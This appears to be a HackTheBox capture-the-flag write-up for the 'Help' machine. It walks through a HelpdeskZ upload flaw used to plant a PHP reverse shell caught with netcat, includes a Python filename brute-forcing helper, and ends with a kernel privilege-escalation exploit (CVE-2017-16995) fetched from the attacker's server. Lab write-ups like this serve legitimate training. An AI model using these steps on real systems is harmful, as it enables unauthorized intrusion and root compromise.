HackTheBox – Help

A port scan using nmap -A reveals the following.

The most obvious attack surface is the Apache server on port 80; however, it only serves the default Apache page.

Further enumeration with dirb http:/// reveals a few directories worth a look; I’m particularly interested in /support.

Navigating to this page opens what appears to be a help desk application (HelpdeskZ), which will hopefully have a vulnerability to exploit.

Running searchsploit helpdeskz returns two known exploits.

As I don’t have credentials, the authenticated SQL injection exploit is out; the file upload exploit looks the more promising way in, since I could perhaps upload a reverse shell.
A little research into this vulnerability confirms that I should be able to.

As per the instructions I filled out a ticket with a PHP reverse shell attached (I used the shell that ships with Kali Linux, /usr/share/webshells/php/php-reverse-shell.php, with the IP and port edited to point back at my machine).

The next step is to find where the shell was uploaded to; checking back over my dirb results shows an uploads subdirectory under /support.

This is looking promising, so I set up a listener using nc -lvp 4321 (the port number that I specified within my reverse shell).

Unfortunately this yielded no results.

Looking back at the exploit description, the uploaded file is renamed to the MD5 hash of the original filename concatenated with the server’s Unix timestamp at upload time, and the exploit’s script recovers that name by brute-forcing a window of recent timestamps. That only works if my clock and the server’s agree. Using this information I did a little digging on the webpage itself: the response headers for the page show that the server’s time is in GMT (I’m running on BST, so this will need to be changed!)

I changed my system time to run off GMT.

I then resubmitted my shell, just to be sure.

I was then greeted by this message, which I ignored, hoping that my file had uploaded anyway.

I then set up my listener again using nc -lvp 4321, ran the exploit’s Python script to locate the file, and bingo! I have a shell!
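The name-recovery step above, as an added example that is not part of the original writeup or of the exploit script itself: it reproduces the naming scheme the exploit describes (MD5 of the original filename concatenated with the server’s time()) and shows why the search has to be anchored on the server’s clock, taken from the HTTP Date header, rather than the attacker’s. The uploads directory, the Date header and the one-hour clock skew are all constructed for the demonstration; on a live target the `exists` callback would be a HEAD request against the uploads directory found with dirb.

```python
import calendar
import email.utils
import hashlib


def upload_name(original_name: str, unix_time: int, ext: str = "php") -> str:
    """Reproduce the naming scheme the exploit describes:
    md5(original filename + time()) followed by the extension.
    (This mirrors the described behaviour; it is not HelpdeskZ's own code.)"""
    digest = hashlib.md5((original_name + str(unix_time)).encode()).hexdigest()
    return f"{digest}.{ext}"


def server_time_from_date_header(date_header: str) -> int:
    """Turn an HTTP Date header (RFC 1123, always GMT) into a Unix timestamp.

    The server's own clock is what feeds time(), so anchoring the search on this
    value sidesteps any skew between attacker and target."""
    parsed = email.utils.parsedate(date_header)
    if parsed is None:
        raise ValueError(f"unparseable Date header: {date_header!r}")
    return calendar.timegm(parsed)


def find_upload(original_name, anchor_time, exists, window=300, ext="php"):
    """Walk back `window` seconds from anchor_time and return the first
    candidate filename for which exists(candidate) is true, else None.

    `exists` is a callable taking a candidate filename; the real exploit
    issues one HEAD request per candidate, here it is whatever the caller supplies."""
    for delta in range(window):
        candidate = upload_name(original_name, anchor_time - delta, ext)
        if exists(candidate):
            return candidate
    return None


# --- constructed demonstration, no network involved ---------------------------
SHELL_NAME = "php-reverse-shell.php"          # name of the attached file
SERVER_DATE = "Mon, 08 Apr 2019 10:00:00 GMT"  # constructed Date header
SERVER_NOW = server_time_from_date_header(SERVER_DATE)

# Pretend the ticket was submitted 12 seconds before the Date header was read,
# and that the attacker's clock is an hour ahead of the server's.
STORED_NAME = upload_name(SHELL_NAME, SERVER_NOW - 12)
FAKE_UPLOADS_DIR = {STORED_NAME}               # stands in for /support/uploads/...
ATTACKER_NOW = SERVER_NOW + 3600


def demo():
    """Return (result anchored on the skewed attacker clock,
               result anchored on the server's Date header)."""
    skewed = find_upload(SHELL_NAME, ATTACKER_NOW, FAKE_UPLOADS_DIR.__contains__)
    correct = find_upload(SHELL_NAME, SERVER_NOW, FAKE_UPLOADS_DIR.__contains__)
    return skewed, correct


if __name__ == "__main__":
    skewed, correct = demo()
    print("anchored on attacker clock (1h ahead):", skewed)
    print("anchored on server Date header:       ", correct)
```

With the attacker’s clock an hour ahead, the 300-second window never reaches the real timestamp and the search comes back empty, which is exactly the “no results” symptom above; anchored on the server’s Date header it finds the file at the 12-second offset.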

Once in, I used python -c 'import pty; pty.spawn("/bin/bash")' to upgrade to an interactive bash shell (just my preference) and went for the user flag.

OK, now I want the root flag. I started an Apache server on my machine so that I could transfer some scripts onto Help.

Over on Help, I downloaded an enumeration script called BeRoot and unzipped the contents.

With the file downloaded, good practice says to stop Apache before going any further, then confirm where my script is located.

Running python beroot.py launches the script, which finds quite a few potential attack vectors.

As I don’t have the password for my user on Help, I can’t use any of the sudo-based techniques. What is interesting, though, is that it flags a vulnerability in the Linux kernel.

Now that I have something to work with, I can remove the scripts that I downloaded, both to cover my tracks a little and so as not to spoil the box for anyone else.

Using searchsploit linux 4.4.0 provides a small list of privilege escalation scripts.

Despite being described as for Ubuntu 16.04.4 while Help runs Ubuntu 16.04.5, the file 44298.c (the Exploit-DB entry for CVE-2017-16995, the BPF sign-extension bug in kernels before 4.4.0-116) is the correct exploit in this case; I discovered this after trying a couple of the others unsuccessfully. A word of caution: kernel exploits can hang or crash the target, so check the running kernel with uname -r against the version range in the exploit header before trying one. I used my Apache server again to transfer the file.

I compiled it with gcc -o rootpls 44298.c, and running ./rootpls successfully spawned a root shell!

First things first, I’ll clean up my mess.

And now it’s just a case of reading the root flag.
